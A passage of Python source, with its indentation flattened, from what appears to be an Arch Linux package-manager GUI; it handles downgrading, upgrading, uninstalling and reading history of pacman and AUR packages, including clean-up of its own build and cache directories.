commit, date = logs[idx][0], logs[idx][1]
with open(srcinfo_path) as f:
pkgsrc = aur.map_srcinfo(string=f.read(), pkgname=context.name, fields=srcfields)
reset_proc = new_subprocess(['git', 'reset', '--hard', commit], cwd=clone_path)
if not context.handler.handle(SystemProcess(reset_proc, check_error_output=False)):
context.handler.watcher.print('Could not downgrade anymore. Aborting...')
return False
epoch, version, release = pkgsrc.get('epoch'), pkgsrc.get('pkgver'), pkgsrc.get('pkgrel')
if epoch:
current_version = '{}:{}-{}'.format(epoch, version, release)
else:
current_version = '{}-{}'.format(version, release)
if commit_found:
context.watcher.change_substatus(self.i18n['arch.downgrade.version_found'])
checkout_proc = new_subprocess(['git', 'checkout', commit_found], cwd=clone_path)
if not context.handler.handle(SystemProcess(checkout_proc, check_error_output=False)):
context.watcher.print("Could not rollback to current version's commit")
return False
reset_proc = new_subprocess(['git', 'reset', '--hard', commit_found], cwd=clone_path)
if not context.handler.handle(SystemProcess(reset_proc, check_error_output=False)):
context.watcher.print("Could not downgrade to previous commit of '{}'. Aborting...".format(commit_found))
return False
break
elif current_version == context.get_version(): # current version found:
commit_found, commit_date = commit, date
context.watcher.change_substatus(self.i18n['arch.downgrade.install_older'])
context.last_modified = commit_date
context.commit = commit_found
return self._build(context)
finally:
if os.path.exists(context.build_dir) and context.config['aur_remove_build_dir']:
context.handler.handle(SystemProcess(subproc=new_subprocess(['rm', '-rf', context.build_dir])))
return False
def _downgrade_repo_pkg(self, context: TransactionContext):
context.watcher.change_substatus(self.i18n['arch.downgrade.searching_stored'])
if not os.path.isdir('/var/cache/pacman/pkg'):
context.watcher.show_message(title=self.i18n['arch.downgrade.error'],
body=self.i18n['arch.downgrade.repo_pkg.no_versions'],
type_=MessageType.ERROR)
return False
available_files = glob.glob("/var/cache/pacman/pkg/{}-*.pkg.tar.*".format(context.name))
if not available_files:
context.watcher.show_message(title=self.i18n['arch.downgrade.error'],
body=self.i18n['arch.downgrade.repo_pkg.no_versions'],
type_=MessageType.ERROR)
return False
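# Matches cached package files named '<pkgname>-<version>-<arch>.pkg.*' in /var/cache/pacman/pkg so the version can be extracted.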
reg = re.compile(r'{}-([\w.\-]+)-(x86_64|any|i686).pkg'.format(context.name))
versions, version_files = [], {}
for file_path in available_files:
found = reg.findall(os.path.basename(file_path))
if found:
ver = found[0][0]
if ver not in versions and ver < context.get_version():
versions.append(ver)
version_files[ver] = file_path
context.watcher.change_progress(40)
if not versions:
context.watcher.show_message(title=self.i18n['arch.downgrade.error'],
body=self.i18n['arch.downgrade.repo_pkg.no_versions'],
type_=MessageType.ERROR)
return False
versions.sort(reverse=True)
context.watcher.change_progress(50)
context.install_files = version_files[versions[0]] # TODO verify
if not self._handle_missing_deps(context=context):
return False
context.watcher.change_substatus(self.i18n['arch.downgrade.install_older'])
context.watcher.change_progress(60)
return self._install(context)
def downgrade(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher) -> bool:
self.aur_client.clean_caches()
if not self._check_action_allowed(pkg, watcher):
return False
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
return False
arch_config = self.configman.get_config()
aur_supported = pkg.repository == 'aur' or aur.is_supported(arch_config)
context = TransactionContext(name=pkg.name, base=pkg.get_base_name(), skip_opt_deps=True,
change_progress=True, dependency=False, repository=pkg.repository, pkg=pkg,
arch_config=arch_config, watcher=watcher, handler=handler, root_password=root_password,
installed=set(), removed={},
aur_supported=aur_supported,
commit=pkg.commit)
self._sync_databases(arch_config=context.config, aur_supported=aur_supported,
root_password=root_password, handler=handler)
watcher.change_progress(5)
if pkg.repository == 'aur':
return self._downgrade_aur_pkg(context)
else:
return self._downgrade_repo_pkg(context)
def clean_cache_for(self, pkg: ArchPackage):
if os.path.exists(pkg.get_disk_cache_path()):
shutil.rmtree(pkg.get_disk_cache_path())
def _check_action_allowed(self, pkg: ArchPackage, watcher: ProcessWatcher) -> bool:
if user.is_root() and pkg.repository == 'aur':
watcher.show_message(title=self.i18n['arch.install.aur.root_error.title'],
body=self.i18n['arch.install.aur.root_error.body'],
type_=MessageType.ERROR)
return False
return True
def _is_database_locked(self, handler: ProcessHandler, root_password: str) -> bool:
if os.path.exists('/var/lib/pacman/db.lck'):
handler.watcher.print('pacman database is locked')
msg = '<p>{}</p><p>{}</p><br/>'.format(self.i18n['arch.action.db_locked.body.l1'],
self.i18n['arch.action.db_locked.body.l2'])
if handler.watcher.request_confirmation(title=self.i18n['arch.action.db_locked.title'].capitalize(),
body=msg,
confirmation_label=self.i18n['arch.action.db_locked.confirmation'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
try:
if not handler.handle_simple(SimpleProcess(['rm', '-rf', '/var/lib/pacman/db.lck'], root_password=root_password)):
handler.watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.action.db_locked.error'],
type_=MessageType.ERROR)
return True
except:
self.logger.error("An error occurred while removing the pacman database lock")
traceback.print_exc()
handler.watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.action.db_locked.error'],
type_=MessageType.ERROR)
return True
else:
handler.watcher.print('Action cancelled by the user. Aborting...')
return True
return False
def _map_conflicting_file(self, output: str) -> List[MultipleSelectComponent]:
error_idx = None
lines = output.split('\n')
for idx, l in enumerate(lines):
if l and l.strip().lower().startswith('error: failed to commit transaction (conflicting files)'):
error_idx = idx
break
files = []
if error_idx and error_idx + 1 < len(lines):
for idx in range(error_idx + 1, len(lines)):
line = lines[idx].strip()
if line and self.re_file_conflict.match(line):
files.append(InputOption(label=line, value=idx, read_only=True))
return [MultipleSelectComponent(options=files, default_options={*files}, label='')]
def _map_dependencies_breakage(self, output: str) -> List[ViewComponent]:
errors = RE_DEPENDENCY_BREAKAGE.findall(output)
if errors:
opts = []
for idx, err in enumerate(errors):
opts.append(InputOption(label=self.i18n['arch.upgrade.error.dep_breakage.item'].format(*err), value=idx, read_only=True))
return [MultipleSelectComponent(label='',
options=opts,
default_options={*opts})]
else:
return [TextComponent(output)]
def list_related(self, pkgs: Collection[str], all_pkgs: Collection[str], data: Dict[str, dict], related: Set[str], provided_map: Dict[str, Set[str]]) -> Set[str]:
related.update(pkgs)
deps = set()
for pkg in pkgs:
pkg_deps = data[pkg]['d']
if pkg_deps:
deps.update({d for d in pkg_deps if d not in related})
if deps:
if not provided_map:
for p in all_pkgs:
for provided in data[p].get('p', {p}):
sources = provided_map.get(provided, set())
provided_map[provided] = sources
sources.add(p)
added_sources = set()
for dep in deps:
sources = provided_map.get(dep)
if sources:
for source in sources:
if source not in related:
related.add(source)
added_sources.add(source)
if added_sources:
self.list_related(added_sources, all_pkgs, data, related, provided_map)
return related
def _upgrade_repo_pkgs(self, to_upgrade: List[str], to_remove: Optional[Set[str]], handler: ProcessHandler, root_password: str,
multithread_download: bool, pkgs_data: Dict[str, dict], overwrite_files: bool = False,
status_handler: TransactionStatusHandler = None, sizes: Dict[str, int] = None, download: bool = True,
check_syncfirst: bool = True, skip_dependency_checks: bool = False) -> bool:
self.logger.info("Total packages to upgrade: {}".format(len(to_upgrade)))
to_sync_first = None
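# Upgrade '-keyring' packages flagged as SyncFirst before everything else (presumably so that signature checks on the remaining packages succeed).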
if check_syncfirst:
to_sync_first = [p for p in pacman.get_packages_to_sync_first() if p.endswith('-keyring') and p in to_upgrade]
self.logger.info("Packages detected to upgrade firstly: {}".format(len(to_sync_first)))
if to_sync_first:
self.logger.info("Upgrading keyrings marked as 'SyncFirst'")
if not self._upgrade_repo_pkgs(to_upgrade=to_sync_first,
to_remove=None,
handler=handler,
root_password=root_password,
sizes=sizes,
download=True,
multithread_download=multithread_download,
pkgs_data=pkgs_data,
check_syncfirst=False):
return False
to_upgrade_remaining = [p for p in to_upgrade if p not in to_sync_first] if to_sync_first else to_upgrade
self.logger.info("Packages remaining to upgrade: {}".format(len(to_upgrade_remaining)))
# pre-downloading all packages before removing any
if download and to_upgrade_remaining:
try:
downloaded = self._download_packages(pkgnames=to_upgrade_remaining,
handler=handler,
root_password=root_password,
sizes=sizes,
multithreaded=multithread_download)
if downloaded < len(to_upgrade_remaining):
self._show_upgrade_download_failed(handler.watcher)
return False
except ArchDownloadException:
self._show_upgrade_download_failed(handler.watcher)
return False
if to_remove and not self._remove_transaction_packages(to_remove, handler, root_password):
return False
if not to_upgrade_remaining:
return True
try:
if status_handler:
output_handler = status_handler
else:
output_handler = TransactionStatusHandler(handler.watcher, self.i18n, {*to_upgrade_remaining}, self.logger, downloading=len(to_upgrade_remaining))
output_handler.start()
self.logger.info("Upgrading {} repository packages: {}".format(len(to_upgrade_remaining), ', '.join(to_upgrade_remaining)))
success, upgrade_output = handler.handle_simple(pacman.upgrade_several(pkgnames=to_upgrade_remaining,
root_password=root_password,
overwrite_conflicting_files=overwrite_files,
skip_dependency_checks=skip_dependency_checks),
output_handler=output_handler.handle)
handler.watcher.change_substatus('')
if success:
output_handler.stop_working()
output_handler.join()
handler.watcher.print("Repository packages successfully upgraded")
handler.watcher.change_substatus(self.i18n['arch.upgrade.caching_pkgs_data'])
repo_map = pacman.map_repositories(to_upgrade_remaining)
pkg_map = {}
for name in to_upgrade_remaining:
repo = repo_map.get(name)
pkg_map[name] = ArchPackage(name=name,
repository=repo,
maintainer=repo,
categories=self.categories.get(name))
disk.write_several(pkgs=pkg_map, overwrite=True, maintainer=None)
return True
elif 'conflicting files' in upgrade_output:
if not handler.watcher.request_confirmation(title=self.i18n['warning'].capitalize(),
body=self.i18n['arch.upgrade.error.conflicting_files'] + ':',
deny_label=self.i18n['arch.upgrade.conflicting_files.proceed'],
confirmation_label=self.i18n['arch.upgrade.conflicting_files.stop'],
components=self._map_conflicting_file(upgrade_output)):
return self._upgrade_repo_pkgs(to_upgrade=to_upgrade_remaining,
handler=handler,
root_password=root_password,
overwrite_files=True,
status_handler=output_handler,
multithread_download=multithread_download,
download=False,
check_syncfirst=False,
pkgs_data=pkgs_data,
to_remove=None,
sizes=sizes,
skip_dependency_checks=skip_dependency_checks)
else:
output_handler.stop_working()
output_handler.join()
handler.watcher.print("Aborted by the user")
return False
elif ' breaks dependency ' in upgrade_output:
if not handler.watcher.request_confirmation(title=self.i18n['warning'].capitalize(),
body=self.i18n['arch.upgrade.error.dep_breakage'] + ':',
deny_label=self.i18n['arch.upgrade.error.dep_breakage.proceed'],
confirmation_label=self.i18n['arch.upgrade.error.dep_breakage.stop'],
components=self._map_dependencies_breakage(upgrade_output)):
return self._upgrade_repo_pkgs(to_upgrade=to_upgrade_remaining,
handler=handler,
root_password=root_password,
overwrite_files=overwrite_files,
status_handler=output_handler,
multithread_download=multithread_download,
download=False,
check_syncfirst=False,
pkgs_data=pkgs_data,
to_remove=None,
sizes=sizes,
skip_dependency_checks=True)
else:
output_handler.stop_working()
output_handler.join()
handler.watcher.print("Aborted by the user")
return False
else:
output_handler.stop_working()
output_handler.join()
self.logger.error("'pacman' returned an unexpected response or error phrase after upgrading the repository packages")
return False
except:
handler.watcher.change_substatus('')
handler.watcher.print("An error occurred while upgrading repository packages")
self.logger.error("An error occurred while upgrading repository packages")
traceback.print_exc()
return False
def _remove_transaction_packages(self, to_remove: Set[str], handler: ProcessHandler, root_password: str) -> bool:
output_handler = TransactionStatusHandler(watcher=handler.watcher,
i18n=self.i18n,
names=set(),
logger=self.logger,
pkgs_to_remove=len(to_remove))
output_handler.start()
try:
success, _ = handler.handle_simple(pacman.remove_several(pkgnames=to_remove,
root_password=root_password,
skip_checks=True),
output_handler=output_handler.handle)
if not success:
self.logger.error("Could not remove packages: {}".format(', '.join(to_remove)))
output_handler.stop_working()
output_handler.join()
return False
return True
except:
self.logger.error("An error occurred while removing packages: {}".format(', '.join(to_remove)))
traceback.print_exc()
output_handler.stop_working()
output_handler.join()
return False
def _show_upgrade_download_failed(self, watcher: ProcessWatcher):
watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.upgrade.mthreaddownload.fail'],
type_=MessageType.ERROR)
def upgrade(self, requirements: UpgradeRequirements, root_password: str, watcher: ProcessWatcher) -> bool:
self.aur_client.clean_caches()
watcher.change_status("{}...".format(self.i18n['manage_window.status.upgrading']))
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
watcher.change_substatus('')
return False
aur_pkgs, repo_pkgs, pkg_sizes = [], [], {}
for req in (*requirements.to_install, *requirements.to_upgrade):
if req.pkg.repository == 'aur':
aur_pkgs.append(req.pkg)
else:
repo_pkgs.append(req.pkg)
pkg_sizes[req.pkg.name] = req.required_size
if aur_pkgs and not self._check_action_allowed(aur_pkgs[0], watcher):
return False
arch_config = self.configman.get_config()
aur_supported = bool(aur_pkgs) or aur.is_supported(arch_config)
self._sync_databases(arch_config=arch_config, aur_supported=aur_supported,
root_password=root_password, handler=handler)
if repo_pkgs:
if not self._upgrade_repo_pkgs(to_upgrade=[p.name for p in repo_pkgs],
to_remove={r.pkg.name for r in requirements.to_remove} if requirements.to_remove else None,
handler=handler,
root_password=root_password,
multithread_download=self._multithreaded_download_enabled(arch_config),
pkgs_data=requirements.context['data'],
sizes=pkg_sizes):
return False
elif requirements.to_remove and not self._remove_transaction_packages({r.pkg.name for r in requirements.to_remove}, handler, root_password):
return False
if aur_pkgs:
watcher.change_status('{}...'.format(self.i18n['arch.upgrade.upgrade_aur_pkgs']))
self.logger.info("Retrieving the 'last_modified' field for each package to upgrade")
pkgs_api_data = self.aur_client.get_info({p.name for p in aur_pkgs})
if not pkgs_api_data:
self.logger.warning("Could not retrieve the 'last_modified' fields from the AUR API during the upgrade process")
any_upgraded = False
for pkg in aur_pkgs:
watcher.change_substatus("{} {} ({})...".format(self.i18n['manage_window.status.upgrading'], pkg.name, pkg.version))
if pkgs_api_data:
apidata = [p for p in pkgs_api_data if p.get('Name') == pkg.name]
if not apidata:
self.logger.warning("AUR API data from package '{}' could not be found".format(pkg.name))
else:
self.aur_mapper.fill_last_modified(pkg=pkg, api_data=apidata[0])
context = TransactionContext.gen_context_from(pkg=pkg, arch_config=arch_config,
root_password=root_password, handler=handler, aur_supported=True)
context.change_progress = False
try:
if not self.install(pkg=pkg, root_password=root_password, watcher=watcher, disk_loader=None, context=context).success:
if any_upgraded:
self._update_aur_index(watcher)
watcher.print(self.i18n['arch.upgrade.fail'].format('"{}"'.format(pkg.name)))
self.logger.error("Could not upgrade AUR package '{}'".format(pkg.name))
watcher.change_substatus('')
return False
else:
any_upgraded = True
watcher.print(self.i18n['arch.upgrade.success'].format('"{}"'.format(pkg.name)))
except:
if any_upgraded:
self._update_aur_index(watcher)
watcher.print(self.i18n['arch.upgrade.fail'].format('"{}"'.format(pkg.name)))
watcher.change_substatus('')
self.logger.error("An error occurred when upgrading AUR package '{}'".format(pkg.name))
traceback.print_exc()
return False
if any_upgraded:
self._update_aur_index(watcher)
watcher.change_substatus('')
return True
def _uninstall_pkgs(self, pkgs: Iterable[str], root_password: str, handler: ProcessHandler, ignore_dependencies: bool = False) -> bool:
status_handler = TransactionStatusHandler(watcher=handler.watcher,
i18n=self.i18n,
names={*pkgs},
logger=self.logger,
pkgs_to_remove=len(pkgs))
cmd = ['pacman', '-R', *pkgs, '--noconfirm']
if ignore_dependencies:
cmd.append('-dd')
status_handler.start()
all_uninstalled, _ = handler.handle_simple(SimpleProcess(cmd=cmd,
root_password=root_password,
error_phrases={'error: failed to prepare transaction',
'error: failed to commit transaction'},
shell=True),
output_handler=status_handler.handle)
status_handler.stop_working()
status_handler.join()
installed = pacman.list_installed_names()
for p in pkgs:
if p not in installed:
cache_path = ArchPackage.disk_cache_path(p)
if os.path.exists(cache_path):
shutil.rmtree(cache_path)
return all_uninstalled
def _request_uninstall_confirmation(self, to_uninstall: Collection[str], required: Collection[str], watcher: ProcessWatcher) -> bool:
reqs = [InputOption(label=p, value=p, icon_path=get_icon_path(), read_only=True) for p in required]
reqs_select = MultipleSelectComponent(options=reqs, default_options=set(reqs), label="", max_per_line=1 if len(reqs) < 4 else 3)
msg = '<p>{}</p><p>{}</p>'.format(self.i18n['arch.uninstall.required_by'].format(bold(str(len(required))), ', '.join(bold(n)for n in to_uninstall)) + '.',
self.i18n['arch.uninstall.required_by.advice'] + '.')
if not watcher.request_confirmation(title=self.i18n['warning'].capitalize(),
body=msg,
components=[reqs_select],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize(),
window_cancel=False):
watcher.print("Aborted")
return False
return True
def _request_unncessary_uninstall_confirmation(self, unnecessary: Iterable[str], watcher: ProcessWatcher) -> Optional[Set[str]]:
reqs = [InputOption(label=p, value=p, icon_path=get_icon_path(), read_only=False) for p in unnecessary]
reqs_select = MultipleSelectComponent(options=reqs, default_options=set(reqs), label="", max_per_line=3 if len(reqs) > 9 else 1)
if not watcher.request_confirmation(title=self.i18n['arch.uninstall.unnecessary.l1'].capitalize(),
body='<p>{}</p>'.format(self.i18n['arch.uninstall.unnecessary.l2'] + ':'),
components=[reqs_select],
deny_label=self.i18n['arch.uninstall.unnecessary.proceed'].capitalize(),
confirmation_label=self.i18n['arch.uninstall.unnecessary.cancel'].capitalize(),
window_cancel=False):
return {*reqs_select.get_selected_values()}
def _request_all_unncessary_uninstall_confirmation(self, pkgs: Collection[str], context: TransactionContext):
reqs = [InputOption(label=p, value=p, icon_path=get_icon_path(), read_only=True) for p in pkgs]
reqs_select = MultipleSelectComponent(options=reqs, default_options=set(reqs), label="", max_per_line=1)
if not context.watcher.request_confirmation(title=self.i18n['confirmation'].capitalize(),
body=self.i18n['arch.uninstall.unnecessary.all'].format(bold(str(len(pkgs)))),
components=[reqs_select],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize(),
window_cancel=False):
context.watcher.print("Aborted")
return False
return True
def _uninstall(self, context: TransactionContext, names: Set[str], remove_unneeded: bool = False, disk_loader: Optional[DiskCacheLoader] = None, skip_requirements: bool = False):
self._update_progress(context, 10)
net_available = self.context.internet_checker.is_available() if disk_loader else True
hard_requirements = set()
if not skip_requirements:
for n in names:
try:
pkg_reqs = pacman.list_hard_requirements(n, self.logger)
if pkg_reqs:
hard_requirements.update(pkg_reqs)
except PackageInHoldException:
context.watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.uninstall.error.hard_dep_in_hold'].format(bold(n)),
type_=MessageType.ERROR)
return False
self._update_progress(context, 25)
to_uninstall = set()
to_uninstall.update(names)
if hard_requirements:
to_uninstall.update(hard_requirements)
if not self._request_uninstall_confirmation(to_uninstall=names,
required=hard_requirements,
watcher=context.watcher):
return False
if not skip_requirements and remove_unneeded:
unnecessary_packages = pacman.list_post_uninstall_unneeded_packages(to_uninstall)
self.logger.info("Checking unnecessary optdeps")
if context.config['suggest_optdep_uninstall']:
unnecessary_packages.update(self._list_opt_deps_with_no_hard_requirements(source_pkgs=to_uninstall))
self.logger.info("Packages no longer needed found: {}".format(len(unnecessary_packages)))
else:
unnecessary_packages = None
self._update_progress(context, 50)
if disk_loader and to_uninstall: # loading package instances in case the uninstall succeeds
instances = self.read_installed(disk_loader=disk_loader,
names={n for n in to_uninstall},
internet_available=net_available).installed
if len(instances) != len(to_uninstall):
self.logger.warning("Not all packages to be uninstalled could be read")
else:
instances = None
uninstalled = self._uninstall_pkgs(to_uninstall, context.root_password, context.handler, ignore_dependencies=skip_requirements)
if uninstalled:
if disk_loader: # loading package instances in case the uninstall succeeds
if instances:
for p in instances:
context.removed[p.name] = p
self._update_progress(context, 70)
if unnecessary_packages:
unnecessary_to_uninstall = self._request_unncessary_uninstall_confirmation(unnecessary=unnecessary_packages,
watcher=context.watcher)
if unnecessary_to_uninstall:
context.watcher.change_substatus(self.i18n['arch.checking_unnecessary_deps'])
unnecessary_requirements = set()
for pkg in unnecessary_to_uninstall:
try:
pkg_reqs = pacman.list_hard_requirements(pkg)
if pkg_reqs:
unnecessary_requirements.update(pkg_reqs)
except PackageInHoldException:
context.watcher.show_message(title=self.i18n['warning'].capitalize(),
body=self.i18n['arch.uninstall.error.hard_dep_in_hold'].format(bold(pkg)),
type_=MessageType.WARNING)
all_unnecessary_to_uninstall = {*unnecessary_to_uninstall, *unnecessary_requirements}
if not unnecessary_requirements or self._request_all_unncessary_uninstall_confirmation(all_unnecessary_to_uninstall, context):
if disk_loader: # loading package instances in case the uninstall succeeds
unnecessary_instances = self.read_installed(disk_loader=disk_loader,
internet_available=net_available,
names=all_unnecessary_to_uninstall).installed
else:
unnecessary_instances = None
unneeded_uninstalled = self._uninstall_pkgs(all_unnecessary_to_uninstall, context.root_password, context.handler)
if unneeded_uninstalled:
to_uninstall.update(all_unnecessary_to_uninstall)
if disk_loader and unnecessary_instances: # loading package instances in case the uninstall succeeds
for p in unnecessary_instances:
context.removed[p.name] = p
else:
self.logger.error("Could not uninstall some unnecessary packages")
context.watcher.print("Could not uninstall some unnecessary packages")
self._update_progress(context, 90)
if bool(context.config['clean_cached']): # cleaning old versions
context.watcher.change_substatus(self.i18n['arch.uninstall.clean_cached.substatus'])
if os.path.isdir('/var/cache/pacman/pkg'):
for p in to_uninstall:
available_files = glob.glob("/var/cache/pacman/pkg/{}-*.pkg.tar.*".format(p))
if available_files and not context.handler.handle_simple(SimpleProcess(cmd=['rm', '-rf', *available_files],
root_password=context.root_password))[0]:
context.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.uninstall.clean_cached.error'].format(bold(p)),
type_=MessageType.WARNING)
self._revert_ignored_updates(to_uninstall)
self._remove_from_editable_pkgbuilds(context.name)
self._update_progress(context, 100)
return uninstalled
def uninstall(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher, disk_loader: DiskCacheLoader) -> TransactionResult:
self.aur_client.clean_caches()
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
return TransactionResult.fail()
removed = {}
arch_config = self.configman.get_config()
success = self._uninstall(TransactionContext(change_progress=True,
arch_config=arch_config,
watcher=watcher,
root_password=root_password,
handler=handler,
removed=removed,
aur_supported=pkg.repository == 'aur' or aur.is_supported(arch_config)),
remove_unneeded=arch_config['suggest_unneeded_uninstall'],
names={pkg.name},
disk_loader=disk_loader) # to be able to return all uninstalled packages
if success:
return TransactionResult(success=True, installed=None, removed=[*removed.values()] if removed else [])
else:
return TransactionResult.fail()
def get_managed_types(self) -> Set["type"]:
return {ArchPackage}
def _get_info_aur_pkg(self, pkg: ArchPackage) -> dict:
fill_pkgbuild = Thread(target=self.aur_mapper.fill_package_build, args=(pkg,), daemon=True)
fill_pkgbuild.start()
if pkg.installed:
info = pacman.get_info_dict(pkg.name)
if info is not None:
self._parse_dates_string_from_info(pkg.name, info)
if pkg.commit:
info['commit'] = pkg.commit
if pkg.last_modified:
info['last_modified'] = self._parse_timestamp(ts=pkg.last_modified,
error_msg="Could not parse AUR package '{}' 'last_modified' field ({})".format(pkg.name, pkg.last_modified))
info['14_installed_files'] = pacman.list_installed_files(pkg.name)
fill_pkgbuild.join()
if pkg.pkgbuild:
info['13_pkg_build'] = pkg.pkgbuild
return info
else:
info = {
'01_id': pkg.id,
'02_name': pkg.name,
'03_description': pkg.description,
'03_version': pkg.version,
'04_popularity': pkg.popularity,
'05_votes': pkg.votes,
'06_package_base': pkg.package_base,
'07_maintainer': pkg.maintainer,
'10_url': pkg.url_download
}
if pkg.first_submitted:
info['08_first_submitted'] = self._parse_timestamp(ts=pkg.first_submitted,
error_msg="Could not parse AUR package '{}' 'first_submitted' field".format(pkg.name, pkg.first_submitted))
if pkg.last_modified:
info['09_last_modified'] = self._parse_timestamp(ts=pkg.last_modified,
error_msg="Could not parse AUR package '{}' 'last_modified' field ({})".format(pkg.name, pkg.last_modified))
srcinfo = self.aur_client.get_src_info(pkg.name)
if srcinfo:
arch_str = 'x86_64' if self.context.is_system_x86_64() else 'i686'
for info_attr, src_attr in {'12_makedepends': 'makedepends',
'13_dependson': 'depends',
'14_optdepends': 'optdepends',
'15_checkdepends': 'checkdepends'}.items():
if srcinfo.get(src_attr):
info[info_attr] = [*srcinfo[src_attr]]
arch_attr = '{}_{}'.format(src_attr, arch_str)
if srcinfo.get(arch_attr):
if not info.get(info_attr):
info[info_attr] = [*srcinfo[arch_attr]]
else:
info[info_attr].extend(srcinfo[arch_attr])
fill_pkgbuild.join()
if pkg.pkgbuild:
info['00_pkg_build'] = pkg.pkgbuild
else:
info['11_pkg_build_url'] = pkg.get_pkg_build_url()
return info
def _parse_dates_string_from_info(self, pkgname: str, info: dict):
for date_attr in ('install date', 'build date'):
en_date_str = info.get(date_attr)
if en_date_str:
try:
info[date_attr] = parse_date(en_date_str)
except ValueError:
self.logger.error("Could not parse date attribute '{}' ({}) from package '{}'".format(date_attr, en_date_str, pkgname))
def _parse_timestamp(self, ts: int, error_msg: str) -> datetime:
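# Converts an epoch timestamp to a datetime instance. Returns None when the timestamp is falsy or cannot be
# converted (the given error message is only logged in that case).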
if ts:
try:
return datetime.fromtimestamp(ts)
except ValueError:
if error_msg:
self.logger.error(error_msg)
def _get_info_repo_pkg(self, pkg: ArchPackage) -> dict:
info = pacman.get_info_dict(pkg.name, remote=not pkg.installed)
if info is not None:
self._parse_dates_string_from_info(pkg.name, info)
if pkg.installed:
info['installed files'] = pacman.list_installed_files(pkg.name)
return info
def get_info(self, pkg: ArchPackage) -> dict:
if pkg.repository == 'aur':
return self._get_info_aur_pkg(pkg)
else:
return self._get_info_repo_pkg(pkg)
def _get_history_aur_pkg(self, pkg: ArchPackage) -> PackageHistory:
if pkg.commit:
self.logger.info("Package '{}' current commit {}".format(pkg.name, pkg.commit))
else:
self.logger.warning("Package '{}' has no commit associated with it. Current history status may not be correct.".format(pkg.name))
arch_config = self.configman.get_config()
temp_dir = '{}/build_{}'.format(get_build_dir(arch_config), int(time.time()))
try:
Path(temp_dir).mkdir(parents=True)
base_name = pkg.get_base_name()
run_cmd('git clone ' + URL_GIT.format(base_name), print_error=False, cwd=temp_dir)
clone_path = '{}/{}'.format(temp_dir, base_name)
srcinfo_path = '{}/.SRCINFO'.format(clone_path)
if not os.path.exists(srcinfo_path):
return PackageHistory.empyt(pkg)
logs = git.log_shas_and_timestamps(clone_path)
if logs:
srcfields = {'epoch', 'pkgver', 'pkgrel'}
history, status_idx = [], -1
for idx, log in enumerate(logs):
commit, timestamp = log[0], log[1]
with open(srcinfo_path) as f:
pkgsrc = aur.map_srcinfo(string=f.read(), pkgname=pkg.name, fields=srcfields)
epoch, version, release = pkgsrc.get('epoch'), pkgsrc.get('pkgver'), pkgsrc.get('pkgrel')
pkgver = '{}:{}'.format(epoch, version) if epoch is not None else version
current_version = '{}-{}'.format(pkgver, release)
if status_idx < 0:
if pkg.commit:
status_idx = idx if pkg.commit == commit else -1
else:
status_idx = idx if current_version == pkg.version else -1
history.append({'1_version': pkgver, '2_release': release,
'3_date': datetime.fromtimestamp(timestamp)}) # the number prefix is to ensure the rendering order
if idx + 1 < len(logs):
if not run_cmd('git reset --hard ' + logs[idx + 1][0], cwd=clone_path):
break
return PackageHistory(pkg=pkg, history=history, pkg_status_idx=status_idx)
finally:
if os.path.exists(temp_dir):
shutil.rmtree(temp_dir)
def _get_history_repo_pkg(self, pkg: ArchPackage) -> PackageHistory:
data = PackageHistory(pkg=pkg, history=[], pkg_status_idx=-1)
versions = [pkg.latest_version]
version_files = {} # maps the version and tar file
if pkg.update:
versions.append(pkg.version)
if os.path.isdir('/var/cache/pacman/pkg'):
available_files = glob.glob("/var/cache/pacman/pkg/{}-*.pkg.tar.*".format(pkg.name))
if available_files:
reg = re.compile(r'{}-([\w.\-]+)-(x86_64|any|i686)\.pkg'.format(pkg.name))
for file_path in available_files:
found = reg.findall(os.path.basename(file_path))
if found:
ver = found[0][0]
if ver not in versions:
versions.append(ver)
version_files[ver] = file_path
versions.sort(reverse=True)
extract_path = '{}/arch/history'.format(TEMP_DIR)
try:
Path(extract_path).mkdir(parents=True, exist_ok=True)
except:
self.logger.error("Could not create temp dir {} to extract previous versions data".format(extract_path))
traceback.print_exc()
return data
try:
for idx, v in enumerate(versions):
cur_version = v.split('-')
cur_data = {'1_version': ''.join(cur_version[0:-1]),
'2_release': cur_version[-1],
'3_date': ''}
if pkg.version == v:
data.pkg_status_idx = idx
version_file = version_files.get(v)
if not version_file:
if v == pkg.version:
cur_data['3_date'] = pacman.get_build_date(pkg.name)
else:
extracted_dir = '{}/{}'.format(extract_path, v)
Path(extracted_dir).mkdir(parents=True, exist_ok=True)
try:
filext = version_file.split('.')[-1]
run_cmd('tar -C {} -I {} -xvf {} .PKGINFO'.format(extracted_dir, 'zstd' if filext == 'zst' else filext, version_file))
except tarfile.ReadError:
if v == pkg.version:
cur_data['3_date'] = pacman.get_build_date(pkg.name)
else:
self.logger.error("Could not read file {}. Skipping version {}".format(version_file, v))
continue
info_file = '{}/.PKGINFO'.format(extracted_dir)
if os.path.isfile(info_file):
with open(info_file) as f:
for l in f.readlines():
if l and l.startswith('builddate'):
cur_data['3_date'] = datetime.fromtimestamp(int(l.split('=')[1].strip()))
break
data.history.append(cur_data)
return data
finally:
if os.path.exists(extract_path):
try:
self.logger.info("Removing temporary history dir {}".format(extract_path))
shutil.rmtree(extract_path)
except:
self.logger.error("Could not remove temp path '{}'".format(extract_path))
raise
def get_history(self, pkg: ArchPackage) -> PackageHistory:
if pkg.repository == 'aur':
return self._get_history_aur_pkg(pkg)
else:
return self._get_history_repo_pkg(pkg)
def _request_conflict_resolution(self, pkg: str, conflicting_pkg: str, context: TransactionContext, skip_requirements: bool = False) -> bool:
conflict_msg = '{} {} {}'.format(bold(pkg), self.i18n['and'], bold(conflicting_pkg))
if not context.watcher.request_confirmation(title=self.i18n['arch.install.conflict.popup.title'],
body=self.i18n['arch.install.conflict.popup.body'].format(conflict_msg)):
context.watcher.print(self.i18n['action.cancelled'])
return False
else:
